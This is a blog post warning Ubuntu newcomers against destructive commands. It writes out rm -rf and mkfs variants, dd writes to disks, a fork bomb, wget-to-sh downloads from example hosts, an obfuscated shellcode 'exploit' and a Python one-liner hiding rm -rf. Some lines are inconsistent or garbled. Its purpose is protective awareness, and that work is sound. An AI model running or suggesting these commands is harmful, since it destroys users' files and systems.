Skip to main content

Commands that Should not be run in ubuntu

These are some of those command which is likely to damage your Ubuntu operating system! 

Please DO NOT use any of them with out proper knowledge , just read it!

sudo rm -rf / (will delete all your files on your system) - required administrator rights!
sudo rm -rf . (will delete the current directory your in) - 
required administrator rights!
sudo rm -rf * (will delete all the files in the current folder) - 
required administrator rights!
rm -rf * or rm -rf *.* ( will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~/ & ( will destroy your home directory) - No administrator rights needed


Commands which will erase your harddisk!

sudo mkfs (will format your hard drive) - 
required administrator rights!
sudo mkfs.ext3 ( will format your hard drive) - required administrator rights!
sudo mkfs.bfs ( will format your hard drive) - 
required administrator rights!
sudo mkfs.cramfs ( will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (will format your hard drive) - 
required administrator rights!
sudo mkfs.minix (will format your hard drive) - 
required administrator rights!
sudo mkfs.msdos (will format your hard drive) - 
required administrator rights!
sudo mkfs.reiserfs (will format your hard drive) - 
required administrator rights!
sudo mkfs.vfat (will format your hard drive) - 
required administrator rights!

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!
sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMANDIt will zero out the whole primary IDE hard drive) ( required administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.

Block device manipulation: Causes raw data to be written to a block device. Often times this will strike violently the filesystem and cause total loss of data!
any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb : It is a malicious script that will execute a number of processes until your system freezes, this will force you to do a hard reboot which may cause damage to your system.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE :
:(){:|:&};:
CODE :
fork while fork

Tarbomb: Let's say that somebody who wants to help you, he offer a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. This archive can be crafted to explode into a billions of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created empty directory!

Decompression bomb: Here's another example. Let's say somebody asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!

Shellscript: This one is very dangrous! Somebody gives you a link to download, to a shellscript and then they will asks you to execute it. This script can contain dangerous command he chooses, and that will damage your system . Do not execute code from people you don't trust! Here are some examples:
CODE :
wget http://my_site/my_file
sh ./some_file

Example :
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script

or
wget http://my_site/my_file -O- | sh
Example :
wget http://ihrd.org/malicious-script -O- | sh

Compiling code: Some person gives you the source code to an application and tells you to compile it. It is easy to hide dangerous codes in side large wad of source code, the attacker can easly damage your system. So Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site.

A famous example I have seen on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE :
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

Here's another example of code that should definitely NOT be executed by anyone!

CODE : python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up.

It is just for awareness of new and inexperienced users , You must know the above commands, don't try them with out any proper knowledge. Good Luck


Comments

Popular posts from this blog

How to install Skype on Ubuntu 10.04 Lucid Lynx

UPDATE: Skype has now been uploaded to the "partner" official Ubuntu 10.04 Lucid Lynx repository. See Install Skype in Ubuntu 10.04 Lucid Lynx from official partner repository Command Line way Get the package: For 32-bit $ wget http://www.skype.com/go/getskype-linux-beta-ubuntu-32 For 64-bit $ wget http://www.skype.com/go/getskype-linux-beta-ubuntu-64 You will need to install the following libraries. $ sudo apt-get install libqt4-dbus libqt4-network libqt4-xml libasound2 Now install skype(the file u just downloaded, may be named intrepid-ibex) $ sudo dpkg -i skype-XXXXXXXXXXXX.deb If you still get some dependency error then just type the command below $ sudo apt-get -f install this will install the dependencies and the skype. Non - Terminal Download the setup 32 -bit 64 -bit You will these packages: libqt4-dbus libqt4-network libqt4-xml . Goto Synaptic manager and install them. Now Launch the Skype install .deb file (just double click it) and follow the on screen prompts.

gtalx: Howto Gtalk in ubuntu ( google talk )

Did you fail to use " gtalk in ubuntu " ... Now you can chat and talk to your gmail buddies in ubuntu... 1. check for gtk2.0 and qt4 $ sudo apt-get install libgtk2.0-dev $ sudo apt-get install libqt4-dev libogg-dev libtheora-dev $ sudo apt-get install libsdl-dev libavcodec-dev libswscale-dev $ sudo apt-get install libexpat-dev libraw1394-dev libvorbis-dev $ sudo apt-get install libgsm1-dev  libspeexdsp-dev libmediastreamer0-dev libortp-dev 2. Remove 'pulse audio sound server' Open synaptic package manager and remove pulse audio 3. "Download gtalx" from here Dowload it here 4. Extract the file.... $ tar -zxvf 0.0.4.tar.gz 5. Get into the directory.... $ cd 0.0.4 and then... $ sudo chmod u+x make $ ./make $ sudo ./make install 6. Enjoy..... Please comment about your installation(whether it was a success or not....) Take gtalx from Applications > Internet > gtalx Enter your gmail login information..and click connect...

Howto Install BSNL wll clarity phone in Ubuntu

Hello linixians, Failed to access internet through your bsnl clarity phone.... Here is an easy way 1. Just download this executable..... bsnlclarity and save it to your home folder. 2. Connect your phone to the system with the usb cable. 3. Now at terminal type $ sudo ./bsnlclarity You will be asked for your username and password for accessing the internet enter it ..... now start surffing Ctrl+C to stop